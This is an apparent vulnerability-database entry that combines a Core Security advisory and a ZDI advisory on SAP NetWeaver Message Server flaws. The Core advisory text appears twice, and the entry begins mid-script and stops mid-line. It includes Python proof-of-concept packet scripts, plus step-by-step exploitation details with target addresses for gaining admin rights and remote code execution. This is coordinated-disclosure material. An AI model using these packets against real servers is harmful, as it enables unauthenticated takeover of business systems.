server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-111 : SAP Netweaver ABAP msg_server.exe Opcode 0x43 Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-111 June 28, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-28 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+yszFVtgMGTo1scAQLv/wf+MRiEiaRsMyaVgI7MTDUo9sXprBObQ6QM yIlVyGLjwEQrO9KsUMlCj/pfLkgjcHYpCNxcrB0+6ZgtphkIQhrB3w0sj/fjRyn1 Vuugvjazu8xffqujZ2ymaQHR+toaQjeKrtWvVbaTdJI6EFuUi+qT5MrZQfRWhE2X uqXdLphMXYH+SRhNtD+zJhxg4U4emVvirqNJa9YLwFE0UpxGRksKCB4Cx89o2QWE NiC9bPznAVCMOBh/R/8uROXkg1Jg9YBhEu7wzJY95Yfsl4oWpSO0cQOCF0WAWiHi TsUy3xHAjW7gMz7v/QMleok6C/7safK/7qjJRMDrGUQO1csmlZUkAg== =FVga -----END PGP SIGNATURE-----
var-202001-0832 A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. The vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add 